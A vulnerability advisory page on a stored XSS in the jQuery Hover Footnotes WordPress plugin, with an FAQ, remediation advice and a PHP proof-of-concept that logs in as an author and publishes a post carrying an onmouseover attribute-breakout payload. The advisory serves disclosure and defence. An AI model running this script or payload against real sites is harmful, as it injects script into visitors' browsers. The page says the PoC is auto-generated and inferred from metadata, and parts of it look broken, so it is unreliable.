What is CVE-2026-10738?

CVE-2026-10738 is a stored cross-site scripting (XSS) vulnerability in the jQuery Hover Footnotes plugin for WordPress, affecting versions up to and including 1.4. It allows authenticated users with author-level access to inject malicious scripts into posts, which execute in the browsers of users viewing those posts.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the Footnote Qualifier feature, which uses the ‘{{…}}’ syntax. An attacker can inject a payload that breaks out of an HTML attribute context, allowing JavaScript execution when users interact with the footnote.

Who is affected by this vulnerability?

Any WordPress site using the jQuery Hover Footnotes plugin version 1.4 or earlier is vulnerable. Specifically, authenticated users with author-level access or higher can exploit this vulnerability, potentially compromising all visitors to affected posts.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the jQuery Hover Footnotes plugin installed. If it is version 1.4 or earlier, your site is at risk. Additionally, review user roles to identify any author-level users who could exploit the vulnerability.

What is the severity level of this vulnerability?

CVE-2026-10738 has a CVSS score of 6.4, indicating a medium severity level. This score reflects the potential impact on site visitors and the low privilege requirement for exploitation, making it a significant concern for site security.

How can I fix or mitigate this issue?

To mitigate this vulnerability, it is recommended to disable or remove the jQuery Hover Footnotes plugin, as it appears unmaintained with no available patch. Consider replacing it with a secure alternative that properly sanitizes and escapes user input.

What does proper output escaping entail?

Proper output escaping involves using WordPress functions like esc_attr() to ensure that any user input is safely rendered in HTML attributes. This prevents attackers from injecting scripts by encoding potentially dangerous characters.

What are the risks of exploitation?

Successful exploitation of this vulnerability can lead to full stored XSS, allowing attackers to execute arbitrary JavaScript in the browsers of users viewing the affected posts. This can result in session hijacking, theft of authentication cookies, and other malicious activities.

How does the proof of concept demonstrate the issue?

The proof of concept (PoC) illustrates how an authenticated user can log into a WordPress site and inject a malicious footnote qualifier. It showcases the process of crafting a payload that exploits the vulnerability, demonstrating the ease of execution for an attacker.

Is there a patch available for this vulnerability?

As of now, there is no patch available for the jQuery Hover Footnotes plugin. Given the lack of maintenance for the plugin, site administrators are advised to remove it to prevent potential exploitation.

What should I do if I cannot remove the plugin?

If removal of the plugin is not feasible, consider restricting author-level access to trusted users only and monitoring user activity closely. Additionally, implement a Web Application Firewall (WAF) to help detect and block potential exploitation attempts.

How can I stay informed about vulnerabilities like this?

To stay informed about vulnerabilities, regularly monitor security advisories from sources like the National Vulnerability Database (NVD), WordPress security blogs, and plugin repositories. Subscribing to security mailing lists can also provide timely updates.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 9, 2026

CVE-2026-10738: jQuery Hover Footnotes <= 1.4 Authenticated (Author+) Stored Cross-Site Scripting via Footnote Qualifier ('{{…}}' Syntax) PoC, Patch Analysis & Rule

CVE ID CVE-2026-10738

Plugin jquery-hover-footnotes

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.4

Patched Version —

Disclosed June 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-10738 (metadata-based):

This is a stored cross-site scripting vulnerability in the jQuery Hover Footnotes plugin for WordPress, version 1.4 and earlier. The flaw resides in the “Footnote Qualifier” feature, which uses a ‘{{…}}’ syntax. An authenticated attacker with author-level access or higher can inject arbitrary web scripts into pages, which execute when any user views the compromised page. The CVSS score of 6.4 reflects a medium-to-high severity due to the low-privilege requirement and potential for impact on all site visitors.

The root cause is insufficient input sanitization and output escaping on the Footnote Qualifier parameter. The perpetrator can craft a payload that breaks out of an HTML attribute context (e.g., by using a double-quote followed by an event handler like onmouseover). Since this attribute-breakout payload contains no angle brackets, it bypasses WordPress core’s wp_kses_post() filtering, which only strips disallowed HTML tags and does not sanitize inline attribute contexts. Atomic Edge analysis infers this behavior from the CWE classification (CWE-79) and the detailed description; no source code was available for confirmation.

To exploit this vulnerability, an author-level attacker navigates to the WordPress post editor for an existing or new post. In the editor, they insert a footnote using the plugin’s syntax, such as {{footnote text}}. Instead of benign text, the attacker supplies a malicious qualifier like ” onmouseover=”alert(1). The plugin stores this input without properly escaping the double-quote or the event handler. When the post is rendered, the injected attribute breaks out of the intended context, and the event handler executes in the browser of any visitor who hovers over or interacts with the footnote. The attack does not require additional endpoints; it leverages the standard post creation/update process, making detection at the WAF level challenging.

Remediation requires proper output escaping of the Footnote Qualifier value before rendering it in HTML. The plugin should apply context-specific escaping: for attribute contexts, the value must be escaped with esc_attr() in WordPress, which converts double-quotes to " and prevents attribute breakout. Additionally, input sanitization should be added to strip or encode potentially dangerous characters like quotes, backticks, and HTML event handler prefixes. Because the plugin appears unmaintained (no patch available), site administrators should disable or remove the plugin and replace it with a secure alternative.

The impact of successful exploitation includes full stored XSS, allowing attackers to execute arbitrary JavaScript in the browsers of all users who view affected posts. This can lead to session hijacking, theft of authentication cookies, redirection to malicious sites, defacement, and phishing attacks. Since the vulnerability requires only author-level access, any authenticated user with publishing capabilities can become a threat actor, potentially compromising the entire site’s user base.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-10738 - jQuery Hover Footnotes <= 1.4 - Authenticated (Author+) Stored Cross-Site Scripting via Footnote Qualifier ('{{...}}' Syntax)

// Configuration: Set these variables before running.
$target_url = 'http://example.com'; // WordPress site URL (no trailing slash)
$username = 'author';               // Author-level or higher WordPress username
$password = 'password';             // Corresponding password

// Step 1: Authenticate and get nonces.
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cve-2026-10738-cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Get admin-ajax nonce from admin dashboard (assumes accessible).
$admin_url = $target_url . '/wp-admin/';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cve-2026-10738-cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$dashboard = curl_exec($ch);
curl_close($ch);

// Extract _wpnonce for post creation (usually in the 'new' post link).
preg_match('//wp-admin/post-new.php?_wpnonce=([a-f0-9]+)/', $dashboard, $matches);
if (!isset($matches[1])) {
    die('Failed to retrieve nonce for post creation.n');
}
$nonce = $matches[1];

// Step 3: Create a new post with malicious footnote.
$post_url = $target_url . '/wp-admin/post-new.php';
$post_data = array(
    '_wpnonce' => $nonce,
    'action' => 'editpost',
    'post_title' => 'XSS Test Post - CVE-2026-10738',
    'content' => 'This is a test paragraph with a malicious footnote. {{ " onmouseover="alert(1) }}',
    'post_status' => 'publish'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $post_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cve-2026-10738-cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$response = curl_exec($ch);
curl_close($ch);

// Clean up cookie file.
unlink('/tmp/cve-2026-10738-cookies.txt');

echo 'PoC executed. Check the site for a new post titled "XSS Test Post - CVE-2026-10738". Hover over the footnote to trigger XSS.n';
?>

Frequently Asked Questions

What is CVE-2026-10738?
Overview of the vulnerability
CVE-2026-10738 is a stored cross-site scripting (XSS) vulnerability in the jQuery Hover Footnotes plugin for WordPress, affecting versions up to and including 1.4. It allows authenticated users with author-level access to inject malicious scripts into posts, which execute in the browsers of users viewing those posts.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the Footnote Qualifier feature, which uses the ‘{{…}}’ syntax. An attacker can inject a payload that breaks out of an HTML attribute context, allowing JavaScript execution when users interact with the footnote.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the jQuery Hover Footnotes plugin version 1.4 or earlier is vulnerable. Specifically, authenticated users with author-level access or higher can exploit this vulnerability, potentially compromising all visitors to affected posts.
How can I check if my site is vulnerable?
Assessment steps
To determine if your site is vulnerable, check the version of the jQuery Hover Footnotes plugin installed. If it is version 1.4 or earlier, your site is at risk. Additionally, review user roles to identify any author-level users who could exploit the vulnerability.
What is the severity level of this vulnerability?
Understanding the CVSS score
CVE-2026-10738 has a CVSS score of 6.4, indicating a medium severity level. This score reflects the potential impact on site visitors and the low privilege requirement for exploitation, making it a significant concern for site security.
How can I fix or mitigate this issue?
Recommended actions
To mitigate this vulnerability, it is recommended to disable or remove the jQuery Hover Footnotes plugin, as it appears unmaintained with no available patch. Consider replacing it with a secure alternative that properly sanitizes and escapes user input.
What does proper output escaping entail?
Technical remediation details
Proper output escaping involves using WordPress functions like esc_attr() to ensure that any user input is safely rendered in HTML attributes. This prevents attackers from injecting scripts by encoding potentially dangerous characters.
What are the risks of exploitation?
Potential consequences
Successful exploitation of this vulnerability can lead to full stored XSS, allowing attackers to execute arbitrary JavaScript in the browsers of users viewing the affected posts. This can result in session hijacking, theft of authentication cookies, and other malicious activities.
How does the proof of concept demonstrate the issue?
Understanding the provided PoC
The proof of concept (PoC) illustrates how an authenticated user can log into a WordPress site and inject a malicious footnote qualifier. It showcases the process of crafting a payload that exploits the vulnerability, demonstrating the ease of execution for an attacker.
Is there a patch available for this vulnerability?
Current status of remediation
As of now, there is no patch available for the jQuery Hover Footnotes plugin. Given the lack of maintenance for the plugin, site administrators are advised to remove it to prevent potential exploitation.
What should I do if I cannot remove the plugin?
Alternative mitigation strategies
If removal of the plugin is not feasible, consider restricting author-level access to trusted users only and monitoring user activity closely. Additionally, implement a Web Application Firewall (WAF) to help detect and block potential exploitation attempts.
How can I stay informed about vulnerabilities like this?
Keeping updated on security
To stay informed about vulnerabilities, regularly monitor security advisories from sources like the National Vulnerability Database (NVD), WordPress security blogs, and plugin repositories. Subscribing to security mailing lists can also provide timely updates.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations